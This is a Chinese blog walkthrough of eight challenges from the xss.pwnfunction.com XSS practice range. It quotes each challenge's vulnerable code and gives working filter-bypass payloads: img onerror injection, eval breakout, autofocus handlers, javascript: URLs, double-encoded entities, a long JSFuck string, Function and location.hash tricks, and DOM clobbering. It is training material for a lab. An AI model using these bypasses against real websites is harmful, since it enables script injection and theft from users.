XSS漏洞

原创 于 2024-08-17 22:51:47 发布 · 1.4k 阅读 · 16 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#xss #前端

文章目录

靶场链接:https://xss.pwnfunction.com/challenges/

**

第一题

**
在这里插入图片描述
代码

<!-- Challenge -->
<h2 id="spaghet"></h2>
<script>
    spaghet.innerHTML = (new URL(location).searchParams.get('somebody') || "Somebody") + " Toucha Ma Spaghet!"
</script>

分析源码:在script标签里边,使用get传参的方式给somebody传一个值,如果没有传值,默认传Somebody+Toucha Ma Spaghet!,然后赋值给spaghet,放在h2标签中
但是这里的spaghet后边加了一个innerHTMl的属性

官方注解:https://developer.mozilla.org/zh-CN/docs/Web/API/Element/innerHTML

在这里插入图片描述

?somebody=<img%20src=1%20οnerrοr="alert(1337)">

成功绕过
在这里插入图片描述
**

第二题

**
在这里插入图片描述

代码如下

<h2 id="maname"></h2>
<script>
    let jeff = (new URL(location).searchParams.get('jeff') || "JEFFF")
    let ma = ""
    eval(`ma = "Ma name ${jeff}"`)
    setTimeout(_ => {
        maname.innerText = ma
    }, 1000)
</script>

分析:这里首先使用get传参的方式,给jeff一个值,将值传给let jeff,变量ma然后执行Ma name +jeff传入的值,setTimeout是延时执行ma,这里的ma带了一个ineerText的属性,
他不会去渲染我们的css样式,意思就是我们在加什么标签之类的东西都不会起效果。所以我们这里只能换一种思路,他不能加标签,那我们看能不能直接闭合ma,之后执行我们的代码。

?jeff=a";alert(1337);"

?jeff=a"-alert(1337);"

成功绕过
在这里插入图片描述
**

第三题

**
在这里插入图片描述
代码

<div id="uganda"></div>
<script>
    let wey = (new URL(location).searchParams.get('wey') || "do you know da wey?");
    wey = wey.replace(/[<>]/g, '')
    uganda.innerHTML = `<input type="text" placeholder="${wey}" class="form-control">`
</script>

分析:还是使用get方式传参;首先是传给wey一个值,然后赋值给变量let wey,然后这里过滤了<>尖括号,最后将我们的变量wey内容传给Uganda,显示在输入框中,Uganda也带一个inner HTML的属性,所以我们不能使用script标签,那就看看其他的思路;
这里使用onfocus 和autofucus 使用焦点的原理,可以使用onfocus获取焦点,再利用autofocus自动获取焦点,所以我们就触发执行代码(用onfocus在input中获取焦点事件,input天生就有焦点事件,应为不可以与用户交互,所以用autofocus自动获取焦点)

?wey=aaa"%20οnfοcus=alert(1337)%20autofocus="

成功
在这里插入图片描述
**

第四题

**

在这里插入图片描述

源码:

<form id="ricardo" method="GET">
    <input name="milos" type="text" class="form-control" placeholder="True" value="True">
</form>
<script>
    ricardo.action = (new URL(location).searchParams.get('ricardo') || '#')
    setTimeout(_ => {
        ricardo.submit()
    }, 2000)
</script>

分析:使用get方式传参;传一个值给Ricardo,这里的submit是提交,意思是将我们传入的值过两秒传给Ricardo。action是他接受的一个伪协议,这里就使用一下JavaScript

?ricardo=javascript:alert(1337)

成功
在这里插入图片描述
**

第五题

**
在这里插入图片描述
源码:

<h2 id="will"></h2>
<script>
    smith = (new URL(location).searchParams.get('markassbrownlee') || "Ah That's Hawt")
    smith = smith.replace(/[\(\`\)\\]/g, '')
    will.innerHTML = smith
</script>

分析:这里主要是过滤,将()\ 和反引号过滤 ;会将这些符号转化为空

还有inner HTML,所以script也不能用了

不妨试一下用img的报错实现,因为我们的括号被过滤,那么我们可以试下使用实体编码进行绕过

?markassbrownlee=<img%20src=1%20οnerrοr=alert&#40;1337&#41;>

在这里插入图片描述

在h2这并没有找到我们插入的标签,这是为什么呢?明明也没有过滤我们的img标签啊

其实是因为url在传参时,会将我们的特殊符号进行解码,但我们传递的是html的实体编码,所以问题出现在了这里,那么我们再将实体编码再进行次url编码

?markassbrownlee=<img%20src=1%20οnerrοr=alert%26%2340%3B1337%26%2341%3B>

成功
在这里插入图片描述
**

第六题

**
在这里插入图片描述
源码:

balls = (new URL(location).searchParams.get('balls') || "Ninja has Ligma")
balls = balls.replace(/[A-Za-z0-9]/g, '')
eval(balls)

解析:
这里我们有个技巧,当看到过滤了大小写和数字时,我们使用一个工具就可以直接进行

解决办法:
利用框架绕过:https://jsfuck.com/
在这里插入图片描述
他就会用一些符号来表示我们的字符和数字等

这里我们将上边转好的复制输入进去

因为+在url传参时,会解码为空格,所以我们要对这些符号再次编码
编码网站:https://cryptii.com/pipes/text-octal

%5b%5d%5b%28%21%5b%5d%2b%5b%5d%29%5b%2b%5b%5d%5d%2b%28%21%5b%5d%2b%5b%5d%29%5b%21%2b%5b%5d%2b%21%2b%5b%5d%5d%2b%28%21%5b%5d%2b%5b%5d%29%5b%2b%21%2b%5b%5d%5d%2b%28%21%21%5b%5d%2b%5b%5d%29%5b%2b%5b%5d%5d%5d%5b%28%5b%5d%5b%28%21%5b%5d%2b%5b%5d%29%5b%2b%5b%5d%5d%2b%28%21%5b%5d%2b%5b%5d%29%5b%21%2b%5b%5d%2b%21%2b%5b%5d%5d%2b%28%21%5b%5d%2b%5b%5d%29%5b%2b%21%2b%5b%5d%5d%2b%28%21%21%5b%5d%2b%5b%5d%29%5b%2b%5b%5d%5d%5d%2b%5b%5d%29%5b%21%2b%5b%5d%2b%21%2b%5b%5d%2b%21%2b%5b%5d%5d%2b%28%21%21%5b%5d%2b%5b%5d%5b%28%21%5b%5d%2b%5b%5d%29%5b%2b%5b%5d%5d%2b%28%21%5b%5d%2b%5b%5d%29%5b%21%2b%5b%5d%2b%21%2b%5b%5d%5d%2b%28%21%5b%5d%2b%5b%5d%29%5b%2b%21%2b%5b%5d%5d%2b%28%21%21%5b%5d%2b%5b%5d%29%5b%2b%5b%5d%5d%5d%29%5b%2b%21%2b%5b%5d%2b%5b%2b%5b%5d%5d%5d%2b%28%5b%5d%5b%5b%5d%5d%2b%5b%5d%29%5b%2b%21%2b%5b%5d%5d%2b%28%21%5b%5d%2b%5b%5d%29%5b%21%2b%5b%5d%2b%21%2b%5b%5d%2b%21%2b%5b%5d%5d%2b%28%21%21%5b%5d%2b%5b%5d%29%5b%2b%5b%5d%5d%2b%28%21%21%5b%5d%2b%5b%5d%29%5b%2b%21%2b%5b%5d%5d%2b%28%5b%5d%5b%5b%5d%5d%2b%5b%5d%29%5b%2b%5b%5d%5d%2b%28%5b%5d%5b%28%21%5b%5d%2b%5b%5d%29%5b%2b%5b%5d%5d%2b%28%21%5b%5d%2b%5b%5d%29%5b%21%2b%5b%5d%2b%21%2b%5b%5d%5d%2b%28%21%5b%5d%2b%5b%5d%29%5b%2b%21%2b%5b%5d%5d%2b%28%21%21%5b%5d%2b%5b%5d%29%5b%2b%5b%5d%5d%5d%2b%5b%5d%29%5b%21%2b%5b%5d%2b%21%2b%5b%5d%2b%21%2b%5b%5d%5d%2b%28%21%21%5b%5d%2b%5b%5d%29%5b%2b%5b%5d%5d%2b%28%21%21%5b%5d%2b%5b%5d%5b%28%21%5b%5d%2b%5b%5d%29%5b%2b%5b%5d%5d%2b%28%21%5b%5d%2b%5b%5d%29%5b%21%2b%5b%5d%2b%21%2b%5b%5d%5d%2b%28%21%5b%5d%2b%5b%5d%29%5b%2b%21%2b%5b%5d%5d%2b%28%21%21%5b%5d%2b%5b%5d%29%5b%2b%5b%5d%5d%5d%29%5b%2b%21%2b%5b%5d%2b%5b%2b%5b%5d%5d%5d%2b%28%21%21%5b%5d%2b%5b%5d%29%5b%2b%21%2b%5b%5d%5d%5d%28%28%21%21%5b%5d%2b%5b%5d%29%5b%2b%21%2b%5b%5d%5d%2b%28%21%21%5b%5d%2b%5b%5d%29%5b%21%2b%5b%5d%2b%21%2b%5b%5d%2b%21%2b%5b%5d%5d%2b%28%21%21%5b%5d%2b%5b%5d%29%5b%2b%5b%5d%5d%2b%28%5b%5d%5b%5b%5d%5d%2b%5b%5d%29%5b%2b%5b%5d%5d%2b%28%21%21%5b%5d%2b%5b%5d%29%5b%2b%21%2b%5b%5d%5d%2b%28%5b%5d%5b%5b%5d%5d%2b%5b%5d%29%5b%2b%21%2b%5b%5d%5d%2b%28%2b%5b%21%5b%5d%5d%2b%5b%5d%5b%28%21%5b%5d%2b%5b%5d%29%5b%2b%5b%5d%5d%2b%28%21%5b%5d%2b%5b%5d%29%5b%21%2b%5b%5d%2b%21%2b%5b%5d%5d%2b%28%21%5b%5d%2b%5b%5d%29%5b%2b%21%2b%5b%5d%5d%2b%28%21%21%5b%5d%2b%5b%5d%29%5b%2b%5b%5d%5d%5d%29%5b%2b%21%2b%5b%5d%2b%5b%2b%21%2b%5b%5d%5d%5d%2b%28%21%21%5b%5d%2b%5b%5d%29%5b%21%2b%5b%5d%2b%21%2b%5b%5d%2b%21%2b%5b%5d%5d%2b%28%2b%28%21%2b%5b%5d%2b%21%2b%5b%5d%2b%21%2b%5b%5d%2b%5b%2b%21%2b%5b%5d%5d%29%29%5b%28%21%21%5b%5d%2b%5b%5d%29%5b%2b%5b%5d%5d%2b%28%21%21%5b%5d%2b%5b%5d%5b%28%21%5b%5d%2b%5b%5d%29%5b%2b%5b%5d%5d%2b%28%21%5b%5d%2b%5b%5d%29%5b%21%2b%5b%5d%2b%21%2b%5b%5d%5d%2b%28%21%5b%5d%2b%5b%5d%29%5b%2b%21%2b%5b%5d%5d%2b%28%21%21%5b%5d%2b%5b%5d%29%5b%2b%5b%5d%5d%5d%29%5b%2b%21%2b%5b%5d%2b%5b%2b%5b%5d%5d%5d%2b%28%5b%5d%2b%5b%5d%29%5b%28%5b%5d%5b%28%21%5b%5d%2b%5b%5d%29%5b%2b%5b%5d%5d%2b%28%21%5b%5d%2b%5b%5d%29%5b%21%2b%5b%5d%2b%21%2b%5b%5d%5d%2b%28%21%5b%5d%2b%5b%5d%29%5b%2b%21%2b%5b%5d%5d%2b%28%21%21%5b%5d%2b%5b%5d%29%5b%2b%5b%5d%5d%5d%2b%5b%5d%29%5b%21%2b%5b%5d%2b%21%2b%5b%5d%2b%21%2b%5b%5d%5d%2b%28%21%21%5b%5d%2b%5b%5d%5b%28%21%5b%5d%2b%5b%5d%29%5b%2b%5b%5d%5d%2b%28%21%5b%5d%2b%5b%5d%29%5b%21%2b%5b%5d%2b%21%2b%5b%5d%5d%2b%28%21%5b%5d%2b%5b%5d%29%5b%2b%21%2b%5b%5d%5d%2b%28%21%21%5b%5d%2b%5b%5d%29%5b%2b%5b%5d%5d%5d%29%5b%2b%21%2b%5b%5d%2b%5b%2b%5b%5d%5d%5d%2b%28%5b%5d%5b%5b%5d%5d%2b%5b%5d%29%5b%2b%21%2b%5b%5d%5d%2b%28%21%5b%5d%2b%5b%5d%29%5b%21%2b%5b%5d%2b%21%2b%5b%5d%2b%21%2b%5b%5d%5d%2b%28%21%21%5b%5d%2b%5b%5d%29%5b%2b%5b%5d%5d%2b%28%21%21%5b%5d%2b%5b%5d%29%5b%2b%21%2b%5b%5d%5d%2b%28%5b%5d%5b%5b%5d%5d%2b%5b%5d%29%5b%2b%5b%5d%5d%2b%28%5b%5d%5b%28%21%5b%5d%2b%5b%5d%29%5b%2b%5b%5d%5d%2b%28%21%5b%5d%2b%5b%5d%29%5b%21%2b%5b%5d%2b%21%2b%5b%5d%5d%2b%28%21%5b%5d%2b%5b%5d%29%5b%2b%21%2b%5b%5d%5d%2b%28%21%21%5b%5d%2b%5b%5d%29%5b%2b%5b%5d%5d%5d%2b%5b%5d%29%5b%21%2b%5b%5d%2b%21%2b%5b%5d%2b%21%2b%5b%5d%5d%2b%28%21%21%5b%5d%2b%5b%5d%29%5b%2b%5b%5d%5d%2b%28%21%21%5b%5d%2b%5b%5d%5b%28%21%5b%5d%2b%5b%5d%29%5b%2b%5b%5d%5d%2b%28%21%5b%5d%2b%5b%5d%29%5b%21%2b%5b%5d%2b%21%2b%5b%5d%5d%2b%28%21%5b%5d%2b%5b%5d%29%5b%2b%21%2b%5b%5d%5d%2b%28%21%21%5b%5d%2b%5b%5d%29%5b%2b%5b%5d%5d%5d%29%5b%2b%21%2b%5b%5d%2b%5b%2b%5b%5d%5d%5d%2b%28%21%21%5b%5d%2b%5b%5d%29%5b%2b%21%2b%5b%5d%5d%5d%5b%28%5b%5d%5b%5b%5d%5d%2b%5b%5d%29%5b%2b%21%2b%5b%5d%5d%2b%28%21%5b%5d%2b%5b%5d%29%5b%2b%21%2b%5b%5d%5d%2b%28%28%2b%5b%5d%29%5b%28%5b%5d%5b%28%21%5b%5d%2b%5b%5d%29%5b%2b%5b%5d%5d%2b%28%21%5b%5d%2b%5b%5d%29%5b%21%2b%5b%5d%2b%21%2b%5b%5d%5d%2b%28%21%5b%5d%2b%5b%5d%29%5b%2b%21%2b%5b%5d%5d%2b%28%21%21%5b%5d%2b%5b%5d%29%5b%2b%5b%5d%5d%5d%2b%5b%5d%29%5b%21%2b%5b%5d%2b%21%2b%5b%5d%2b%21%2b%5b%5d%5d%2b%28%21%21%5b%5d%2b%5b%5d%5b%28%21%5b%5d%2b%5b%5d%29%5b%2b%5b%5d%5d%2b%28%21%5b%5d%2b%5b%5d%29%5b%21%2b%5b%5d%2b%21%2b%5b%5d%5d%2b%28%21%5b%5d%2b%5b%5d%29%5b%2b%21%2b%5b%5d%5d%2b%28%21%21%5b%5d%2b%5b%5d%29%5b%2b%5b%5d%5d%5d%29%5b%2b%21%2b%5b%5d%2b%5b%2b%5b%5d%5d%5d%2b%28%5b%5d%5b%5b%5d%5d%2b%5b%5d%29%5b%2b%21%2b%5b%5d%5d%2b%28%21%5b%5d%2b%5b%5d%29%5b%21%2b%5b%5d%2b%21%2b%5b%5d%2b%21%2b%5b%5d%5d%2b%28%21%21%5b%5d%2b%5b%5d%29%5b%2b%5b%5d%5d%2b%28%21%21%5b%5d%2b%5b%5d%29%5b%2b%21%2b%5b%5d%5d%2b%28%5b%5d%5b%5b%5d%5d%2b%5b%5d%29%5b%2b%5b%5d%5d%2b%28%5b%5d%5b%28%21%5b%5d%2b%5b%5d%29%5b%2b%5b%5d%5d%2b%28%21%5b%5d%2b%5b%5d%29%5b%21%2b%5b%5d%2b%21%2b%5b%5d%5d%2b%28%21%5b%5d%2b%5b%5d%29%5b%2b%21%2b%5b%5d%5d%2b%28%21%21%5b%5d%2b%5b%5d%29%5b%2b%5b%5d%5d%5d%2b%5b%5d%29%5b%21%2b%5b%5d%2b%21%2b%5b%5d%2b%21%2b%5b%5d%5d%2b%28%21%21%5b%5d%2b%5b%5d%29%5b%2b%5b%5d%5d%2b%28%21%21%5b%5d%2b%5b%5d%5b%28%21%5b%5d%2b%5b%5d%29%5b%2b%5b%5d%5d%2b%28%21%5b%5d%2b%5b%5d%29%5b%21%2b%5b%5d%2b%21%2b%5b%5d%5d%2b%28%21%5b%5d%2b%5b%5d%29%5b%2b%21%2b%5b%5d%5d%2b%28%21%21%5b%5d%2b%5b%5d%29%5b%2b%5b%5d%5d%5d%29%5b%2b%21%2b%5b%5d%2b%5b%2b%5b%5d%5d%5d%2b%28%21%21%5b%5d%2b%5b%5d%29%5b%2b%21%2b%5b%5d%5d%5d%2b%5b%5d%29%5b%2b%21%2b%5b%5d%2b%5b%2b%21%2b%5b%5d%5d%5d%2b%28%21%21%5b%5d%2b%5b%5d%29%5b%21%2b%5b%5d%2b%21%2b%5b%5d%2b%21%2b%5b%5d%5d%5d%5d%28%21%2b%5b%5d%2b%21%2b%5b%5d%2b%21%2b%5b%5d%2b%5b%21%2b%5b%5d%2b%21%2b%5b%5d%5d%29%2b%28%21%5b%5d%2b%5b%5d%29%5b%2b%21%2b%5b%5d%5d%2b%28%21%5b%5d%2b%5b%5d%29%5b%21%2b%5b%5d%2b%21%2b%5b%5d%5d%29%28%29%28%28%21%5b%5d%2b%5b%5d%29%5b%2b%21%2b%5b%5d%5d%2b%28%21%5b%5d%2b%5b%5d%29%5b%21%2b%5b%5d%2b%21%2b%5b%5d%5d%2b%28%21%21%5b%5d%2b%5b%5d%29%5b%21%2b%5b%5d%2b%21%2b%5b%5d%2b%21%2b%5b%5d%5d%2b%28%21%21%5b%5d%2b%5b%5d%29%5b%2b%21%2b%5b%5d%5d%2b%28%21%21%5b%5d%2b%5b%5d%29%5b%2b%5b%5d%5d%2b%28%5b%5d%5b%28%21%5b%5d%2b%5b%5d%29%5b%2b%5b%5d%5d%2b%28%21%5b%5d%2b%5b%5d%29%5b%21%2b%5b%5d%2b%21%2b%5b%5d%5d%2b%28%21%5b%5d%2b%5b%5d%29%5b%2b%21%2b%5b%5d%5d%2b%28%21%21%5b%5d%2b%5b%5d%29%5b%2b%5b%5d%5d%5d%2b%5b%5d%29%5b%2b%21%2b%5b%5d%2b%5b%21%2b%5b%5d%2b%21%2b%5b%5d%2b%21%2b%5b%5d%5d%5d%2b%5b%2b%21%2b%5b%5d%5d%2b%5b%21%2b%5b%5d%2b%21%2b%5b%5d%2b%21%2b%5b%5d%5d%2b%5b%21%2b%5b%5d%2b%21%2b%5b%5d%2b%21%2b%5b%5d%5d%2b%5b%21%2b%5b%5d%2b%21%2b%5b%5d%2b%21%2b%5b%5d%2b%21%2b%5b%5d%2b%21%2b%5b%5d%2b%21%2b%5b%5d%2b%21%2b%5b%5d%5d%2b%28%5b%2b%5b%5d%5d%2b%21%5b%5d%2b%5b%5d%5b%28%21%5b%5d%2b%5b%5d%29%5b%2b%5b%5d%5d%2b%28%21%5b%5d%2b%5b%5d%29%5b%21%2b%5b%5d%2b%21%2b%5b%5d%5d%2b%28%21%5b%5d%2b%5b%5d%29%5b%2b%21%2b%5b%5d%5d%2b%28%21%21%5b%5d%2b%5b%5d%29%5b%2b%5b%5d%5d%5d%29%5b%21%2b%5b%5d%2b%21%2b%5b%5d%2b%5b%2b%5b%5d%5d%5d%29

成功
在这里插入图片描述
**

第七题

**
在这里插入图片描述
源码:

mafia = (new URL(location).searchParams.get('mafia') || '1+1')
mafia = mafia.slice(0, 50)
mafia = mafia.replace(/[\`\'\"\+\-\!\\\[\]]/gi, '_')
mafia = mafia.replace(/alert/g, '_')
eval(mafia)

分析:这里还是get方式传参,但是限制我们传入的参数长度最大为50个字节,而且过滤了一大堆东西,最后执行mafia

很明显上一关的方法就不行了

代码漏洞,他过滤了符号和alert函数,但是没有过滤confirm 函数

?mafia=confirm(1)

成功
在这里插入图片描述
但是很明显考察的不是这个
有一下三种方法
第一种:构造函数(用Function构造一个ALERT(1337)函数),因为用小写的alert会被过滤,但是js严格区分大小写,所以我们要在构造函数的时候调用转小写的函数,记得在最后加上()让这个函数执行,如下

?mafia=Function(/ALERT(1337)/.source.toLowerCase())()

在这里插入图片描述
第二种:eval(8680439..toString(30))(1337)
利用eval和 to String()
在这里插入图片描述
toString()是返回一个函数的字符串,内容是函数的源码
在这里插入图片描述
这里返回了一个alert,那我们大胆猜前边的8680439就是的,但是是咋来的呢?其实就是我们的alert使用parseint函数转换成了30进制的一个整数
在这里插入图片描述
在这里插入图片描述
这里的三十是代表三十进制,因为要想直接显示alert,16进制是从0-9,A-F,所以到T这里就是三十进制了。所以最后执行代码就成功了。
在这里插入图片描述
第三种

?mafia=eval(location.hash.slice(1))#alert(1337)

location.hash是取URL里面#后面的值,而slice就是分片,这样就可以取到#后面的值了alert(1337)
在这里插入图片描述
注意:#后面的值是不会影响传参的。

**

第八题

**
在这里插入图片描述
源码

<h2 id="boomer">Ok, Boomer.</h2>
<script>
    boomer.innerHTML = DOMPurify.sanitize(new URL(location).searchParams.get('boomer') || "Ok, Boomer")
    setTimeout(ok, 2000)
</script>

分析:这道题通过get参数将内容写入h2标签内,而且有过滤框架DOMPurify

DOMPurify防御用户输入框架,会把你的危险属性过滤完了

这个过滤框架由安全团队cure53开发,以我们的技术很难绕过

但是注意setTimeout函数内的ok参数

这里的JS代码是没有任何关于ok参数的定义的,所以我们可以使用DOM破坏
在这里插入图片描述
突破口:setTimeout(ok, 2000)
这里使用一个dom clobbering称之为dom破坏技术

<a id=ok href=tel:alert(1337)>

在这里插入图片描述

V_vevive
关注
DOYO网站xss漏洞测试
明哥哥知识分享
08-27 1474
一、寻找xss漏洞 一般想获取最高权限,就要找存储型xss漏洞,这样的漏洞是服务器和浏览器进行数据交换的,有利于数据写入进去。一般留言板、评论区可能性最大。 1、评论区 <script>alert(1111)</script> 弹出1111,证明咱们找到评论区xss漏洞了。并且代码也执行了。 2、留言板 aaaaa<script>alert(222)</script> 由于这个留言需要管理员审查,我们去后台看一下,有没有弹窗。
xss.pwnfunction靶场
newlife1441的博客
07-31 1180
靶场是验证我们学习情况和提升做题技巧很好的平台,这里将为大家介绍一个非常不错的xss靶场XSSGamehttps。
XSS靶场————XSS.pwnfunction
m0_69151365的博客
08-17 1239
这关他用了写一个一个过滤框架,他这个框架我对我们输入的代码进行一个过滤,将危险代码去除,所以我们的危险代码是不起作用的,所以我们再想想有没有别的方法,看看这个setTimeout(ok,200),这个定时器有什么作用的,在这个代码里显得非常多余,所以这也是我们突破的点,这里ok会被执行,我们写一个标签也给他赋值为ok,这时候这个标签就会被这个定时器,执行语句就用伪协议,js中伪协议有很多,这个框架将所有的伪协议过滤是不现实的,所以我们找到他过滤的白名单就行了,我们试试
xss.pwnfunction(DOM型XSS)靶场
duoba_an的博客
03-19 1395
环境进入该网站
xss.pwnfunction-Mafia
weixin_63750160的博客
04-08 812
"location.hash" 是 JavaScript 中用来获取当前页面 URL 中的锚点(即 # 号后面的部分)的属性。通过访问 "location.hash",你可以获取当前页面 URL 中的锚点信息。这里为什么用30因为在转换进制的时候是0-9其次才是a-z也就是说他在20位加上0-9正好是30。"slice" 是 JavaScript 中用来提取字符串中指定部分的方法。这个是利用的构造函数 用source来获取构造函数的源码并转化成小写。用parseint将alert转成进制。
DedeCMS 存储型xss漏洞1
08-03
【DedeCMS 存储型 XSS 漏洞1】详解 DedeCMS 是一款广泛使用的基于PHP的开源网站管理系统,其特色在于提供了一个简洁易用的后台管理界面,帮助企业或个人快速构建网站。然而,如同任何软件一样,DedeCMS 也存在安全...
XSS学习笔记:XSS Game(xss.pwnfunction.com)1-11通关全解
闵行小鱼塘
10-09 3303
继续学习XSS,本篇是XSS Game(xss.pwnfunction.com)平台的通关全解
XSS漏洞测试工具
02-10
XSS是一种非常常见的漏洞类型,它的影响非常的广泛并且很容易的就能被检测到。 攻击者可以在未经验证的情况下,将不受信任的JavaScript片段插入到你的应用程序中,然后这个JavaScript将被访问目标站点的受害者执行
XSS漏洞检测工具
06-11
XSS漏洞检测工具,Linux下安装使用,很简单 Examples of usage: ============================== * Simple injection from URL: $ python XSSer.py -u "http://host.com" ------------------- * Simple injection from File, with tor proxy and spoofing HTTP Referer headers: $ python XSSer.py -i "file.txt" --proxy "http://127.0.0.1:8118" --referer "666.666.666.666" ------------------- * Multiple injections from URL, with automatic payloading, using tor proxy, injecting on payloads character encoding in "Hexadecimal", with verbose output and saving results to file (XSSlist.dat): $ python XSSer.py -u "http://host.com" --proxy "http://127.0.0.1:8118" --auto --Hex --verbose -w ------------------- * Multiple injections from URL, with automatic payloading, using caracter encoding mutations (first, change payload to hexadecimal; second, change to StringFromCharCode the first encoding; third, reencode to Hexadecimal the second encoding), with HTTP User-Agent spoofed, changing timeout to "20" and using multithreads (5 threads): $ python XSSer.py -u "http://host.com" --auto --Cem "Hex,Str,Hex" --user-agent "XSSer!!" --timeout "20" --threads "5"
XSS攻击检测
01-22
XSS攻击检测代码,删除bin生成的class,直接使用src加载.java 就好了,开发采用的myeclipse,使用其他工具的注意修改,
XSS跨站测试代码大全,及处理
weixin_30603633的博客
04-03 527
//跨站解决方式,处理所有用户输入【intval(),format_param()】处理:对用户输入参数进行处理//防注入函数 function clear_gpc($var){ if (get_magic_quotes_gpc()) { $var = htmlspecialchars(trim($var)); }else{ ...
xss漏洞开源网站
先剃度再出家
01-22 3346
链接:https://pan.baidu.com/s/1VcV98H2arVz7nogCeij7LQ 提取码:dyog 复制这段内容后打开百度网盘手机App,操作更方便哦
XSS测试
jeskon的博客
07-23 262
得到的
Web应用进行XSS漏洞测试
MeAmI的专栏
09-11 888
对 WEB 应用进行 XSS 漏洞测试,不能仅仅局限于在 WEB 页面输入 XSS 攻击字段,然后提交。绕过 JavaScript 的检测,输入 XSS 脚本,通常被测试人员忽略。下图为 XSS 恶意输入绕过 JavaScript 检   对 WEB 应用进行 XSS 漏洞测试,不能仅仅局限于在 WEB 页面输入 XSS 攻击字段,然后提交。绕过 JavaScript 的检测,输入 X
XSStrike:智能XSS漏洞检测工具
gitblog_00087的博客
03-19 724
是一个强大的自动化工具,专为探测和利用跨站脚本(Cross-Site Scripting, XSS漏洞而设计。它融合了人工智能与传统模式匹配技术,使得在大规模扫描和测试中能够识别出潜在的安全隐患,对于任何关心网站安全性的开发者、渗透测试人员或安全研究人员来说,都是不可或缺的工具。 ## 技术分析 XSStrike 基于Python编写,利用了以下几个核心模块和技术: 1. **AI & N...
遇到了一个存在XSS(存储型)漏洞网站
weixin_64311421的博客
07-25 1362
网站漏洞
XSS 漏洞
最新发布
09-02
XSS(Cross-Site Scripting)即跨站脚本攻击,是一种常见的 Web 安全漏洞攻击者通过在目标网站注入恶意脚本,当其他用户访问该网站时,恶意脚本会在用户的浏览器中执行,从而窃取用户信息或进行其他恶意操作[^1]。...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值